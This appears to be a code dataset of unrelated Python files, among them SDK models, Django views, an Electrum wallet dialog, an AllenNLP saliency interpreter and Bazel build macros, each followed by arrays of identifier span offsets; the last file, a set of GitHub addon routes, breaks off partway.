print("Oops! Your solution should have worked. In which case, no output should have printed. This solution should follow just as in the screencast.")
# Question 6
def r2_test_check(r2_test):
'''
INPUT r2_test - the rsquared value from fitting a model with all nan values dropped and only using quantitative variables.
    Prints statement related to the correctness of the rsquared value matching the solution.
'''
if r2_test == s.r2_test:
print("Nice job! That's right! Your rsquared matches the solution.")
else:
print("Oops! That wasn't the value that was expected. You should fit your model using the training data, predict on the X_test data, and then score comparing the y_test and your predicted values.")
# Question 7
def question7_check(question7_solution):
'''
INPUT question7_solution - a dictionary with statements of takeaways from the rest of the notebook. The values should be the variables a, b, c, d, e, f, or g
Prints statement related to the correctness of the solution of the dictionary
'''
if question7_solution == s.question7_solution:
print("Nice job! That looks right to me! We would really like to predict for anyone who provides a salary, but our model right now definitely has some limitations.")
elif question7_solution['The number of reported salaries in the original dataset'] != s.question7_solution['The number of reported salaries in the original dataset']:
print("The number of reported salaries in the original dataset doesn't look quite right.")
elif question7_solution['The number of test salaries predicted using our model'] != s.question7_solution['The number of test salaries predicted using our model']:
print("The number of salaries predicted using our model doesn't look quite right.")
elif question7_solution['If an individual does not rate stackoverflow, but has a salary'] != s.question7_solution['If an individual does not rate stackoverflow, but has a salary']:
print("Whether an individual rates stackoverflow or has a job satisfaction we would still like to predict the salary if we can.")
elif question7_solution['If an individual does not have a a job satisfaction, but has a salary'] != s.question7_solution['If an individual does not have a a job satisfaction, but has a salary']:
print("Whether an individual rates stackoverflow or has a job satisfaction we would still like to predict the salary if we can.")
elif question7_solution['Our model predicts salaries for the two individuals described above.'] != s.question7_solution['Our model predicts salaries for the two individuals described above.']:
print("Unfortunately, our current model will not predict for anyone who has missing values in any column - even if they do have a salary!")
| [
[
[
7,
19
]
],
[
[
28,
39
],
[
352,
354
]
],
[
[
65,
76
]
],
[
[
85,
107
],
[
375,
376
],
[
902,
903
],
[
1414,
1415
],
[
2039,
2040
],
[
2739,
2740
],
[
3330,
3331
],
[
3994,
3995
],
[
4283,
4284
],
[
4553,
4554
],
[
4823,
4824
],
[
5155,
5156
],
[
5493,
5494
]
],
[
[
129,
143
]
],
[
[
578,
589
]
],
[
[
1111,
1126
]
],
[
[
1753,
1764
]
],
[
[
2436,
2451
]
],
[
[
3062,
3075
]
],
[
[
3660,
3675
]
]
] |
# import sharpy.utils.settings as settings
# import sharpy.utils.exceptions as exceptions
# import sharpy.utils.cout_utils as cout
import numpy as np
import importlib
import unittest
import os
import sharpy.utils.cout_utils as cout
class TestCoupledPrescribed(unittest.TestCase):
"""
"""
@classmethod
def setUpClass(cls):
# run all the cases generators
# case = 'smith_2deg_prescribed'
# mod = importlib.import_module('tests.coupled.prescribed.' + case + '.generate_' + case)
# case = 'rotating_wing'
# mod1 = importlib.import_module('tests.coupled.prescribed.' + case + '.generate_' + case)
pass
@classmethod
def tearDownClass(cls):
pass
# def test_smith2deg_prescribed(self):
# import sharpy.sharpy_main
# solver_path = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) +
# '/smith_2deg_prescribed/smith_2deg_prescribed.sharpy')
# sharpy.sharpy_main.main(['', solver_path])
#
# # read output and compare
# output_path = os.path.dirname(solver_path) + 'output/aero/'
# forces_data = np.genfromtxt(output_path + 'smith_2deg_prescribed_aeroforces.csv')
# self.assertAlmostEqual(forces_data[-1, 3], -3.728e1, 1)
def test_rotating_wing(self):
# import sharpy.sharpy_main
# solver_path = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) +
# '/rotating_wing/rotating_wing.sharpy')
# sharpy.sharpy_main.main(['', solver_path])
cout.cout_wrap('No tests for prescribed dynamic configurations (yet)!', 1)
pass
| [
[
[
138,
149
]
],
[
[
157,
166
]
],
[
[
174,
182
],
[
262,
270
]
],
[
[
190,
192
]
],
[
[
200,
231
],
[
1604,
1608
]
],
[
[
240,
261
]
]
] |
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_8_2_2.models.cloud_proxy import CloudProxy # noqa: F401,E501
class CloudProxyCreateParams(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'host': 'str',
'name': 'str',
'password': 'str',
'port': 'int',
'type': 'str',
'username': 'str'
}
attribute_map = {
'host': 'host',
'name': 'name',
'password': 'password',
'port': 'port',
'type': 'type',
'username': 'username'
}
def __init__(self, host=None, name=None, password=None, port=None, type=None, username=None): # noqa: E501
"""CloudProxyCreateParams - a model defined in Swagger""" # noqa: E501
self._host = None
self._name = None
self._password = None
self._port = None
self._type = None
self._username = None
self.discriminator = None
self.host = host
self.name = name
if password is not None:
self.password = password
self.port = port
self.type = type
if username is not None:
self.username = username
@property
def host(self):
"""Gets the host of this CloudProxyCreateParams. # noqa: E501
A host name or network address for connecting to this proxy # noqa: E501
:return: The host of this CloudProxyCreateParams. # noqa: E501
:rtype: str
"""
return self._host
@host.setter
def host(self, host):
"""Sets the host of this CloudProxyCreateParams.
A host name or network address for connecting to this proxy # noqa: E501
:param host: The host of this CloudProxyCreateParams. # noqa: E501
:type: str
"""
if host is None:
raise ValueError("Invalid value for `host`, must not be `None`") # noqa: E501
self._host = host
@property
def name(self):
"""Gets the name of this CloudProxyCreateParams. # noqa: E501
A unique friendly name for this proxy configuration # noqa: E501
:return: The name of this CloudProxyCreateParams. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this CloudProxyCreateParams.
A unique friendly name for this proxy configuration # noqa: E501
:param name: The name of this CloudProxyCreateParams. # noqa: E501
:type: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def password(self):
"""Gets the password of this CloudProxyCreateParams. # noqa: E501
The password to connect to this proxy if required (write-only) # noqa: E501
:return: The password of this CloudProxyCreateParams. # noqa: E501
:rtype: str
"""
return self._password
@password.setter
def password(self, password):
"""Sets the password of this CloudProxyCreateParams.
The password to connect to this proxy if required (write-only) # noqa: E501
:param password: The password of this CloudProxyCreateParams. # noqa: E501
:type: str
"""
self._password = password
@property
def port(self):
"""Gets the port of this CloudProxyCreateParams. # noqa: E501
The port used to connect to this proxy # noqa: E501
:return: The port of this CloudProxyCreateParams. # noqa: E501
:rtype: int
"""
return self._port
@port.setter
def port(self, port):
"""Sets the port of this CloudProxyCreateParams.
The port used to connect to this proxy # noqa: E501
:param port: The port of this CloudProxyCreateParams. # noqa: E501
:type: int
"""
if port is None:
raise ValueError("Invalid value for `port`, must not be `None`") # noqa: E501
self._port = port
@property
def type(self):
"""Gets the type of this CloudProxyCreateParams. # noqa: E501
The type of connection used to connect to this proxy # noqa: E501
:return: The type of this CloudProxyCreateParams. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this CloudProxyCreateParams.
The type of connection used to connect to this proxy # noqa: E501
:param type: The type of this CloudProxyCreateParams. # noqa: E501
:type: str
"""
if type is None:
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
allowed_values = ["socks_4", "socks_5", "http"] # noqa: E501
if type not in allowed_values:
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def username(self):
"""Gets the username of this CloudProxyCreateParams. # noqa: E501
The username to connect to this proxy if required # noqa: E501
:return: The username of this CloudProxyCreateParams. # noqa: E501
:rtype: str
"""
return self._username
@username.setter
def username(self, username):
"""Sets the username of this CloudProxyCreateParams.
The username to connect to this proxy if required # noqa: E501
:param username: The username of this CloudProxyCreateParams. # noqa: E501
:type: str
"""
self._username = username
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CloudProxyCreateParams):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
[
[
243,
249
],
[
7308,
7314
]
],
[
[
257,
259
]
],
[
[
282,
285
],
[
6504,
6507
]
],
[
[
332,
342
]
],
[
[
370,
392
],
[
7548,
7570
]
]
] |
from django.urls import include, path
from rest_framework import routers
from . import views
from .views import *
router = routers.DefaultRouter()
router.register(r"tracks", views.TrackViewSet)
urlpatterns = [
path("", include(router.urls)),
path('playlist/add', PlaylistAPIView.as_view()),
path('allplaylist/', PlayListViewSet.as_view({'get': 'list'})),
path('playlist/<id>', PlaylistAPIView.as_view()),
path('playlist/delete/<id>', PlaylistAPIView.as_view()),
path('playlist/addTrack/<id>', PlaylistAPIView.as_view(),name="addTrack"),
path('playlist/removeTrack/<id>', PlaylistAPIView.as_view(),name="removeTrack"),
]
| [
[
[
24,
31
],
[
226,
233
]
],
[
[
33,
37
],
[
217,
221
],
[
253,
257
],
[
306,
310
],
[
374,
378
],
[
429,
433
],
[
490,
494
],
[
569,
573
]
],
[
[
65,
72
],
[
125,
132
]
],
[
[
88,
93
],
[
176,
181
]
],
[
[
113,
114
],
[
274,
289
],
[
327,
342
],
[
396,
411
],
[
458,
473
],
[
521,
536
],
[
603,
618
]
],
[
[
116,
122
],
[
149,
155
],
[
234,
240
]
],
[
[
197,
208
]
]
] |
# This example displays the images myImage_1 and myImage_2.
# Create the "smiley" image.
myImage_1 = [ 0b00111100, #
              0b01000010, #
              0b10100101, #
              0b10000001, #
              0b10100101, #
              0b10011001, #
              0b01000010, #
              0b00111100 ] #
# Create the "TV set" image.
myImage_2 = [ 0b01000100, #
              0b00101000, #
              0b00010000, #
              0b11111111, #
              0b10000011, #
              0b10000011, #
              0b10000011, #
              0b11111111 ] #
from pyiArduinoI2Cmatrix import *   # Load the library for working with the 8x8 LED matrix.
from time import sleep              # Import the wait (sleep) function.
disp = pyiArduinoI2Cmatrix(0x09)    # Create the disp object for the 8x8 LED matrix, specifying its address on the I2C bus.
#
try:                                # Enter the exception-handling block.
    while True:                     # Enter an infinite loop.
        disp.drawImage(myImage_1),  # Show the myImage_1 bitmap on the display
        sleep(2)                    # and wait a couple of seconds.
        disp.drawImage(myImage_2),  # Show the myImage_2 bitmap on the display
        sleep(2)                    # and wait a couple of seconds.
except:                             # If an exception is raised (e.g. the script is stopped from the keyboard),
    disp.reset()                    # reset the module's settings.
| [
[
[
132,
141
],
[
1790,
1799
]
],
[
[
751,
760
],
[
1942,
1951
]
],
[
[
1329,
1330
],
[
1470,
1489
]
],
[
[
1409,
1414
],
[
1865,
1870
],
[
2017,
2022
]
],
[
[
1463,
1467
],
[
1775,
1779
],
[
1927,
1931
],
[
2183,
2187
]
]
] |
from django.http import HttpResponse
from django.views.decorators.http import require_http_methods
from django.shortcuts import render
import re
# Create your views here.
@require_http_methods(['GET', 'POST'])
def echo_0(request):
    if request.method == 'GET':
        return render(request, 'echo.html', {})
    elif request.method in ['POST', 'PUT']:
        return HttpResponse(status=405)
def parser(string):
result = re.match(r'[aA-zZ]+',string)
return result.group(0)
# def echo(request):
# try:
# if (request.method == 'GET'):
# meta = parser(request.META['QUERY_STRING'])
# return render(request, 'echo.html', context={
# 'get_letters': meta,
# 'get_value': request.GET.get(meta),
# 'get_tag': request.META.get('HTTP_X_PRINT_STATEMENT'),
# 'request_method': request.META['REQUEST_METHOD'].lower()
# })
# elif request.method == 'POST':
# meta = parser(request.META['QUERY_STRING'])
# return render(request, 'echo.html', context={
# 'get_letters': meta,
# 'get_value': request.POST.get(meta),
# 'get_tag': request.META.get('HTTP_X_PRINT_STATEMENT'),
# 'request_method': request.META['REQUEST_METHOD'].lower()
# })
# except:
# return HttpResponse(status=404)
# def echo(request):
# if (request.method == 'GET'):
# meta = parser(request.META['QUERY_STRING'])
# return render(request, 'echo.html', context={
# 'get_letters': meta,
# 'get_value': request.GET.get(meta),
# 'get_tag': request.META.get('HTTP_X_PRINT_STATEMENT'),
# 'request_method': request.META['REQUEST_METHOD'].lower()
# })
# elif request.method == 'POST':
# #print(request.META['QUERY_STRING'])
# print(request.POST)
# return render(request, 'echo.html', context={
# 'get_letters':'a',
# 'get_value': 1,
# 'get_tag': request.META.get('HTTP_X_PRINT_STATEMENT'),
# 'request_method': request.META['REQUEST_METHOD'].lower()
# })
def echo(request):
context = {
'get' : request.GET,
'post' : request.POST,
'meta' : request.META
}
return render(request,"echo.html",context = context)
def filters(request):
return render(request, 'filters.html', context={
'a': request.GET.get('a', 1),
'b': request.GET.get('b', 1)
})
# <!-- {% extends base.html%} -->
#
def extend(request):
return render(request, 'extend.html', context={
'a': request.GET.get('a'),
'b': request.GET.get('b')
})
#
# <!--DOCTYPE html -->
# <html>
# <body>
# {% if 'QUERY_STRING' in request.META %}
# <h1> {{ request_method }} {{ get_letter }}: {{ get_value }} statement is empty </h1>
# {% elif 'HTTP_X_PRINT_STATEMENT' in request.META %}
# <h2> statement is {{get_tag}} </h2>
# {% endif %}
# </body>
# </html>
| [
[
[
24,
36
]
],
[
[
78,
98
],
[
173,
193
]
],
[
[
128,
134
],
[
301,
307
],
[
2404,
2410
],
[
2485,
2491
],
[
2679,
2685
]
],
[
[
142,
144
],
[
468,
470
]
],
[
[
215,
221
]
],
[
[
439,
445
]
],
[
[
2266,
2270
]
],
[
[
2456,
2463
]
],
[
[
2651,
2657
]
]
] |
from kivy.app import App
from kivy.factory import Factory
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from kivy.clock import Clock
from kivy.uix.label import Label
from electrum_commercium_gui.kivy.i18n import _
from datetime import datetime
from electrum_commercium.util import InvalidPassword
Builder.load_string('''
<TxDialog>
id: popup
title: _('Transaction')
is_mine: True
can_sign: False
can_broadcast: False
fee_str: ''
date_str: ''
date_label:''
amount_str: ''
tx_hash: ''
status_str: ''
description: ''
outputs_str: ''
BoxLayout:
orientation: 'vertical'
ScrollView:
GridLayout:
height: self.minimum_height
size_hint_y: None
cols: 1
spacing: '10dp'
padding: '10dp'
GridLayout:
height: self.minimum_height
size_hint_y: None
cols: 1
spacing: '10dp'
BoxLabel:
text: _('Status')
value: root.status_str
BoxLabel:
text: _('Description') if root.description else ''
value: root.description
BoxLabel:
text: root.date_label
value: root.date_str
BoxLabel:
text: _('Amount sent') if root.is_mine else _('Amount received')
value: root.amount_str
BoxLabel:
text: _('Transaction fee') if root.fee_str else ''
value: root.fee_str
TopLabel:
text: _('Outputs') + ':'
OutputList:
height: self.minimum_height
size_hint: 1, None
id: output_list
TopLabel:
text: _('Transaction ID') + ':' if root.tx_hash else ''
TxHashLabel:
data: root.tx_hash
name: _('Transaction ID')
Widget:
size_hint: 1, 0.1
BoxLayout:
size_hint: 1, None
height: '48dp'
Button:
size_hint: 0.5, None
height: '48dp'
text: _('Sign') if root.can_sign else _('Broadcast') if root.can_broadcast else ''
disabled: not(root.can_sign or root.can_broadcast)
opacity: 0 if self.disabled else 1
on_release:
if root.can_sign: root.do_sign()
if root.can_broadcast: root.do_broadcast()
IconButton:
size_hint: 0.5, None
height: '48dp'
icon: 'atlas://gui/kivy/theming/light/qrcode'
on_release: root.show_qr()
Button:
size_hint: 0.5, None
height: '48dp'
text: _('Close')
on_release: root.dismiss()
''')
class TxDialog(Factory.Popup):
def __init__(self, app, tx):
Factory.Popup.__init__(self)
self.app = app
self.wallet = self.app.wallet
self.tx = tx
def on_open(self):
self.update()
def update(self):
format_amount = self.app.format_amount_and_units
tx_hash, self.status_str, self.description, self.can_broadcast, amount, fee, height, conf, timestamp, exp_n = self.wallet.get_tx_info(self.tx)
self.tx_hash = tx_hash or ''
if timestamp:
self.date_label = _('Date')
self.date_str = datetime.fromtimestamp(timestamp).isoformat(' ')[:-3]
elif exp_n:
self.date_label = _('Mempool depth')
self.date_str = _('{} from tip').format('%.2f MB'%(exp_n/1000000))
else:
self.date_label = ''
self.date_str = ''
if amount is None:
self.amount_str = _("Transaction unrelated to your wallet")
elif amount > 0:
self.is_mine = False
self.amount_str = format_amount(amount)
else:
self.is_mine = True
self.amount_str = format_amount(-amount)
self.fee_str = format_amount(fee) if fee is not None else _('unknown')
self.can_sign = self.wallet.can_sign(self.tx)
self.ids.output_list.update(self.tx.outputs())
def do_sign(self):
self.app.protected(_("Enter your PIN code in order to sign this transaction"), self._do_sign, ())
def _do_sign(self, password):
self.status_str = _('Signing') + '...'
Clock.schedule_once(lambda dt: self.__do_sign(password), 0.1)
def __do_sign(self, password):
try:
self.app.wallet.sign_transaction(self.tx, password)
except InvalidPassword:
self.app.show_error(_("Invalid PIN"))
self.update()
def do_broadcast(self):
self.app.broadcast(self.tx)
def show_qr(self):
from electrum_commercium.bitcoin import base_encode, bfh
text = bfh(str(self.tx))
text = base_encode(text, base=43)
self.app.qr_dialog(_("Raw Transaction"), text)
| [
[
[
21,
24
]
],
[
[
50,
57
],
[
3149,
3156
],
[
3207,
3214
]
],
[
[
86,
100
]
],
[
[
123,
130
],
[
326,
333
]
],
[
[
154,
159
],
[
4719,
4724
]
],
[
[
187,
192
]
],
[
[
240,
241
],
[
3684,
3685
],
[
3826,
3827
],
[
3873,
3874
],
[
4060,
4061
],
[
4377,
4378
],
[
4550,
4551
],
[
4690,
4691
],
[
4958,
4959
],
[
5254,
5255
]
],
[
[
263,
271
],
[
3722,
3730
]
],
[
[
309,
324
],
[
4909,
4924
]
],
[
[
3140,
3148
]
]
] |
import math
from typing import List
import numpy
from allennlp.common.util import JsonDict, sanitize
from allennlp.interpret.saliency_interpreters.saliency_interpreter import SaliencyInterpreter
from allennlp.nn import util
@SaliencyInterpreter.register("simple-gradient")
class SimpleGradient(SaliencyInterpreter):
"""
Registered as a `SaliencyInterpreter` with name "simple-gradient".
"""
def saliency_interpret_from_json(self, inputs: JsonDict) -> JsonDict:
"""
Interprets the model's prediction for inputs. Gets the gradients of the loss with respect
to the input and returns those gradients normalized and sanitized.
"""
labeled_instances = self.predictor.json_to_labeled_instances(inputs)
# List of embedding inputs, used for multiplying gradient by the input for normalization
embeddings_list: List[numpy.ndarray] = []
instances_with_grads = dict()
for idx, instance in enumerate(labeled_instances):
# Hook used for saving embeddings
handle = self._register_forward_hook(embeddings_list)
grads = self.predictor.get_gradients([instance])[0]
handle.remove()
# Gradients come back in the reverse order that they were sent into the network
embeddings_list.reverse()
for key, grad in grads.items():
# Get number at the end of every gradient key (they look like grad_input_[int],
# we're getting this [int] part and subtracting 1 for zero-based indexing).
# This is then used as an index into the reversed input array to match up the
# gradient and its respective embedding.
input_idx = int(key[-1]) - 1
# The [0] here is undo-ing the batching that happens in get_gradients.
emb_grad = numpy.sum(grad[0] * embeddings_list[input_idx], axis=1)
norm = numpy.linalg.norm(emb_grad, ord=1)
normalized_grad = [math.fabs(e) / norm for e in emb_grad]
grads[key] = normalized_grad
instances_with_grads["instance_" + str(idx + 1)] = grads
return sanitize(instances_with_grads)
def _register_forward_hook(self, embeddings_list: List):
"""
Finds all of the TextFieldEmbedders, and registers a forward hook onto them. When forward()
is called, embeddings_list is filled with the embedding values. This is necessary because
our normalization scheme multiplies the gradient by the embedding value.
"""
def forward_hook(module, inputs, output):
embeddings_list.append(output.squeeze(0).clone().detach().numpy())
embedding_layer = util.find_embedding_layer(self.predictor._model)
handle = embedding_layer.register_forward_hook(forward_hook)
return handle
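# Illustrative usage sketch (not part of the original AllenNLP module). The
# archive path and the "sentence" input key are hypothetical and depend on the
# predictor being loaded; Predictor.from_path and the "simple-gradient"
# registration above are the real mechanisms this class plugs into.
if __name__ == "__main__":
    from allennlp.predictors.predictor import Predictor

    predictor = Predictor.from_path("/path/to/model.tar.gz")  # hypothetical archive
    interpreter = SimpleGradient(predictor)
    saliency = interpreter.saliency_interpret_from_json({"sentence": "a very fine movie"})
    print(saliency)  # e.g. {"instance_1": {"grad_input_1": [ ...normalized scores... ]}}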
| [
[
[
7,
11
],
[
2029,
2033
]
],
[
[
32,
36
],
[
880,
884
],
[
2284,
2288
]
],
[
[
44,
49
],
[
885,
890
],
[
1880,
1885
],
[
1959,
1964
]
],
[
[
84,
92
],
[
472,
480
],
[
459,
467
]
],
[
[
94,
102
],
[
2198,
2206
]
],
[
[
177,
196
],
[
298,
317
],
[
229,
248
]
],
[
[
221,
225
],
[
2751,
2755
]
],
[
[
283,
297
]
]
] |
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_5 import models
class Qos(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'bandwidth_limit': 'int',
'iops_limit': 'int'
}
attribute_map = {
'bandwidth_limit': 'bandwidth_limit',
'iops_limit': 'iops_limit'
}
required_args = {
}
def __init__(
self,
bandwidth_limit=None, # type: int
iops_limit=None, # type: int
):
"""
Keyword args:
bandwidth_limit (int): The maximum QoS bandwidth limit for the volume. Whenever throughput exceeds the bandwidth limit, throttling occurs. Measured in bytes per second. Maximum limit is 512 GB/s.
iops_limit (int): The QoS IOPs limit for the volume.
"""
if bandwidth_limit is not None:
self.bandwidth_limit = bandwidth_limit
if iops_limit is not None:
self.iops_limit = iops_limit
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `Qos`".format(key))
if key == "bandwidth_limit" and value is not None:
if value > 549755813888:
raise ValueError("Invalid value for `bandwidth_limit`, value must be less than or equal to `549755813888`")
if value < 1048576:
raise ValueError("Invalid value for `bandwidth_limit`, must be a value greater than or equal to `1048576`")
if key == "iops_limit" and value is not None:
if value > 104857600:
raise ValueError("Invalid value for `iops_limit`, value must be less than or equal to `104857600`")
if value < 100:
raise ValueError("Invalid value for `iops_limit`, must be a value greater than or equal to `100`")
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Qos, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Qos):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
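# Illustrative usage sketch (not part of the generated client module). The
# values are arbitrary but stay inside the bounds enforced by __setattr__
# above (bandwidth 1048576..549755813888 bytes/s, IOPS 100..104857600).
if __name__ == "__main__":
    example_qos = Qos(bandwidth_limit=524288000, iops_limit=10000)
    print(example_qos.to_dict())  # {'bandwidth_limit': 524288000, 'iops_limit': 10000}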
| [
[
[
270,
276
],
[
3806,
3812
]
],
[
[
284,
286
]
],
[
[
295,
298
],
[
2788,
2791
]
],
[
[
306,
312
],
[
353,
359
]
],
[
[
341,
349
],
[
2584,
2592
]
],
[
[
422,
428
]
],
[
[
436,
439
],
[
3592,
3595
],
[
4046,
4049
]
]
] |
# Copyright 2019 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Pigweed build environment for bazel."""
DEBUGGING = [
"-g",
]
# Standard compiler flags to reduce output binary size.
REDUCED_SIZE_COPTS = [
"-fno-common",
"-fno-exceptions",
"-ffunction-sections",
"-fdata-sections",
]
STRICT_WARNINGS_COPTS = [
"-Wall",
"-Wextra",
# Make all warnings errors, except for the exemptions below.
"-Werror",
"-Wno-error=cpp", # preprocessor #warning statement
"-Wno-error=deprecated-declarations", # [[deprecated]] attribute
]
CPP17_COPTS = [
"-std=c++17",
"-fno-rtti",
"-Wnon-virtual-dtor",
# Allow uses of the register keyword, which may appear in C headers.
"-Wno-register",
]
DISABLE_PENDING_WORKAROUND_OPTS = [
"-Wno-private-header",
]
PW_DEFAULT_COPTS = (
DEBUGGING +
REDUCED_SIZE_COPTS +
STRICT_WARNINGS_COPTS +
DISABLE_PENDING_WORKAROUND_OPTS
)
PW_DEFAULT_LINKOPTS = []
def _add_defaults(kwargs):
"""Adds default arguments suitable for both C and C++ code to kwargs."""
kwargs["copts"] = kwargs.get("copts", []) + PW_DEFAULT_COPTS
kwargs["linkopts"] = kwargs.get("linkopts", []) + PW_DEFAULT_LINKOPTS
# Set linkstatic to avoid building .so files.
kwargs["linkstatic"] = True
kwargs.setdefault("features", [])
# Crosstool--adding this line to features disables header modules, which
# don't work with -fno-rtti. Note: this is not a command-line argument,
# it's "minus use_header_modules".
kwargs["features"].append("-use_header_modules")
def _default_cc_and_c_kwargs(kwargs):
_add_defaults(kwargs)
kwargs.setdefault("srcs", [])
cc = dict(kwargs.items())
cc["srcs"] = [src for src in kwargs["srcs"] if not src.endswith(".c")]
cc["copts"] = cc["copts"] + CPP17_COPTS
c_srcs = [src for src in kwargs["srcs"] if src.endswith(".c")]
if c_srcs:
c = dict(kwargs.items())
c["name"] += "_c"
c["srcs"] = c_srcs + [src for src in kwargs["srcs"] if src.endswith(".h")]
cc["deps"] = cc.get("deps", []) + [":" + c["name"]]
return cc, c
return cc, None
def _add_cc_and_c_targets(target, kwargs):
cc_kwargs, c_kwargs = _default_cc_and_c_kwargs(kwargs)
if c_kwargs:
native.cc_library(**c_kwargs)
target(**cc_kwargs)
def pw_cc_binary(**kwargs):
_add_cc_and_c_targets(native.cc_binary, kwargs)
def pw_cc_library(**kwargs):
_add_cc_and_c_targets(native.cc_library, kwargs)
def pw_cc_test(**kwargs):
kwargs["deps"] = kwargs.get("deps", []) + ["//pw_unit_test:main"]
_add_cc_and_c_targets(native.cc_test, kwargs)
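# Illustrative BUILD-file usage of the macros above (shown as a comment, since
# these macros are meant to be invoked from BUILD files rather than from this
# .bzl). The load label and the target/file names are hypothetical:
#
#   load("//pw_build:pigweed.bzl", "pw_cc_library", "pw_cc_test")
#
#   pw_cc_library(
#       name = "my_module",
#       srcs = ["my_module.cc", "helpers.c"],  # .c files are split into a "_c" twin target
#       hdrs = ["public/my_module/my_module.h"],
#   )
#
#   pw_cc_test(
#       name = "my_module_test",
#       srcs = ["my_module_test.cc"],
#       deps = [":my_module"],  # "//pw_unit_test:main" is appended automatically
#   )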
| [
[
[
629,
638
],
[
1359,
1368
]
],
[
[
712,
730
],
[
1375,
1393
]
],
[
[
830,
851
],
[
1400,
1421
]
],
[
[
1094,
1105
],
[
2338,
2349
]
],
[
[
1268,
1299
],
[
1428,
1459
]
],
[
[
1334,
1350
],
[
1642,
1658
]
],
[
[
1463,
1482
],
[
1713,
1732
]
],
[
[
1493,
1506
],
[
2144,
2157
]
],
[
[
2106,
2130
],
[
2749,
2773
]
],
[
[
2684,
2705
],
[
2896,
2917
],
[
2978,
2999
],
[
3128,
3149
]
],
[
[
2868,
2880
]
],
[
[
2949,
2962
]
],
[
[
3032,
3042
]
]
] |
# -*- coding: utf-8 -*-
from framework.routing import Rule, json_renderer
from website.addons.github import views
settings_routes = {
'rules': [
# Configuration
Rule(
[
'/project/<pid>/github/settings/',
'/project/<pid>/node/<nid>/github/settings/',
],
'post',
views.config.github_set_config,
json_renderer,
),
Rule(
[
'/project/<pid>/github/settings/',
'/project/<pid>/node/<nid>/github/settings/',
],
'get',
views.config.github_get_config,
json_renderer,
),
Rule(
[
'/project/<pid>/github/settings/',
'/project/<pid>/node/<nid>/github/settings/',
'/project/<pid>/github/config/',
'/project/<pid>/node/<nid>/github/config/',
],
'delete',
views.config.github_remove_node_settings,
json_renderer,
),
Rule(
[
'/project/<pid>/github/repos/',
'/project/<pid>/node/<nid>/github/repos/',
],
'get',
views.config.github_repo_list,
json_renderer,
),
Rule(
[
'/project/<pid>/github/tarball/',
'/project/<pid>/node/<nid>/github/tarball/',
],
'get',
views.crud.github_download_starball,
json_renderer,
{'archive': 'tar'},
endpoint_suffix='__tar',
),
Rule(
[
'/project/<pid>/github/zipball/',
'/project/<pid>/node/<nid>/github/zipball/',
],
'get',
views.crud.github_download_starball,
json_renderer,
{'archive': 'zip'},
endpoint_suffix='__zip',
),
Rule(
[
'/project/<pid>/github/hook/',
'/project/<pid>/node/<nid>/github/hook/',
],
'post',
views.hooks.github_hook_callback,
json_renderer,
),
# OAuth: User
Rule(
'/settings/github/oauth/',
'get',
views.auth.github_oauth_start,
